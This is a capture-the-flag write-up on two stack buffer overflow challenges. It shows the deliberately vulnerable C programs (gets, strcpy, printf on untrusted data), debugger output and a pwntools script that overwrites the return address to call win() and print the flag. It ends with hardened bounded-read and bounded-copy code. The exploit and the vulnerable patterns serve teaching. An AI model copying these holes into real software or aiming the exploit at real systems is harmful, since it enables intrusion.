# Buffer Overflow

## #1 Simple BoF

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>   /* getegid(), setresgid() */

#define FLAGSIZE_MAX 64

char flag[FLAGSIZE_MAX];

/* The challenge hands out the flag when the process crashes with SIGSEGV */
void sigsegv_handler(int sig) {
  printf("%s\n", flag);
  fflush(stdout);
  exit(1);
}

/* Intended bug: 16-byte stack buffer, unbounded strcpy() from a 100-byte input */
void vuln(char *input){
  char buf2[16];
  strcpy(buf2, input);
}

int main(int argc, char **argv){
  
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }
  
  fgets(flag,FLAGSIZE_MAX,f);
  signal(SIGSEGV, sigsegv_handler); // Set up signal handler
  
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  printf("Input: ");
  fflush(stdout);
  char buf1[100];
  gets(buf1);   /* unbounded read: the first overflow point */
  vuln(buf1);
  printf("The program will exit now\n");
  return 0;
}
```

```
┌─[root@kali]─[]
└──╼ $ nc saturn.net 55986
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```

## #2

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"   /* non-standard header shipped with the challenge; declares get_return_address() */

#define BUFSIZE 32
#define FLAGSIZE 64

/* Never called by the program itself; the goal is to redirect execution here */
void win() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);   /* flag contents used directly as the format string (challenge as shipped) */
}

/* Intended bug: 32-byte stack buffer filled by an unbounded gets() */
void vuln(){
  char buf[BUFSIZE];
  gets(buf);

  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();
  return 0;
}
```

```
┌─[root@kali]─[bof_1]
└──╼ $ checksec vuln
[*] '/bof_1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
```

```
gef➤  p win
$1 = {<text variable, no debug info>} 0x80491f6 <win>
```

```
gef➤  r
Starting program: /bof_1/vuln 
Please enter your string: 
AAAAAAAA

...
gef➤  search-pattern AAAAAAAA
[+] Searching 'AAAAAAAA' in memory
[+] In '[heap]'(0x804d000-0x806f000), permission=rwx
  0x804d1a0 - 0x804d1aa  →   "AAAAAAAA\n" 
[+] In '[stack]'(0xfffdd000-0xffffe000), permission=rwx
  0xffffd050 - 0xffffd058  →   "AAAAAAAA" 
gef➤  i f
Stack level 0, frame at 0xffffd080:
 eip = 0x80492a3 in vuln; saved eip = 0x804932f
 called by frame at 0xffffd0b0
 Arglist at 0xffffd03c, args: 
 Locals at 0xffffd03c, Previous frame's sp is 0xffffd080
 Saved registers:
  ebx at 0xffffd074, ebp at 0xffffd078, eip at 0xffffd07c
```

```python
from pwn import *

elf = ELF('./vuln')
libc = elf.libc

if args.REMOTE:
    p = remote('saturn.net',61406)
else:
    p = process(elf.path)

# payload buffer
# offset from the gef output above: buf at 0xffffd050, saved eip at 0xffffd07c
# -> 0xffffd07c - 0xffffd050 = 0x2c = 44 bytes of padding before the return address
payload = b'A'*44
# address of win() from `p win` (no PIE, so it is fixed)
payload += p32(0x80491f6)

print(p.recvuntil(':'))
p.send(payload)
p.interactive()
```

```
┌─[root@kali]─[/bof_1]
└──╼ $ python3 bof1.py REMOTE
[*] '/bof_1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[*] '/usr/lib32/libc-2.31.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to saturn.picoctf.net on port 61406: Done
b'Please enter your string:'
[*] Switching to interactive mode

$ 
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
CTF{addr3ss3s_ar3_3asy_60fac6aa}
[*] Got EOF while reading in interactive
```
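Both challenges share the same two defects: an unbounded read (`gets()`) or copy (`strcpy()`) into a fixed-size stack buffer, and, in #2, untrusted data passed to `printf()` as the format string. The following is an added example (not the challenge's or picoCTF's code) of the corrected counterparts: a bounded line reader that reports when a line did not fit, a bounded copy that refuses oversized input rather than overwriting the saved return address, and a printing helper that never uses untrusted bytes as a format. The function names `read_line_bounded`, `copy_bounded`, `print_untrusted` and `vuln_hardened` are hypothetical; `fmemopen()` (POSIX) is assumed available for feeding constructed input.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() when testing */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSIZE 32   /* same local buffer size as the challenge's vuln() in #2 */

/* Bounded replacement for gets(): stores at most size-1 bytes plus a NUL in buf
 * and strips the trailing newline. Returns the number of bytes stored, -1 on
 * EOF/error, and -2 if the line was longer than the buffer (the rest of that
 * line is drained so the next call starts on a fresh line). */
int read_line_bounded(FILE *in, char *buf, size_t size) {
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
        return (int)len;
    }
    if (len == size - 1) {
        /* buffer filled without seeing '\n': either the line fit exactly or it was too long */
        int c = fgetc(in);
        if (c == EOF || c == '\n')
            return (int)len;
        while (c != EOF && c != '\n')
            c = fgetc(in);
        return -2;
    }
    return (int)len;   /* last line of input had no newline */
}

/* Bounded replacement for strcpy(): refuses input that would not fit (including
 * the NUL) and leaves dst untouched. Returns 0 on success, -1 when rejected. */
int copy_bounded(char *dst, size_t dstsize, const char *src) {
    size_t n = strlen(src);
    if (n >= dstsize)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Replacement for printf(buf): the untrusted bytes are data, never the format */
void print_untrusted(const char *s) {
    fputs(s, stdout);
    fputc('\n', stdout);
}

/* Hardened version of vuln() from #1: same 16-byte local buffer, but an input
 * that would overflow it is rejected before anything is written. */
int vuln_hardened(const char *input) {
    char buf2[16];
    if (copy_bounded(buf2, sizeof buf2, input) != 0)
        return -1;   /* rejected: saved registers and return address untouched */
    print_untrusted(buf2);
    return 0;
}

int main(void) {
    char line[BUFSIZE];
    printf("Input: ");
    fflush(stdout);
    int n = read_line_bounded(stdin, line, sizeof line);
    if (n == -2) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof line - 1);
        return 1;
    }
    if (n < 0)
        return 1;
    if (vuln_hardened(line) != 0) {
        fputs("input rejected\n", stderr);
        return 1;
    }
    return 0;
}
```

Run against the 100-plus-byte line from the #1 session or the 44-byte padding from the #2 exploit, the program reports the oversized input and exits instead of crashing, so there is no SIGSEGV for the handler to catch and no controlled return address. Note that `fgets()` alone only truncates; the explicit length bookkeeping is what lets the caller tell a truncated line from one that fit.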
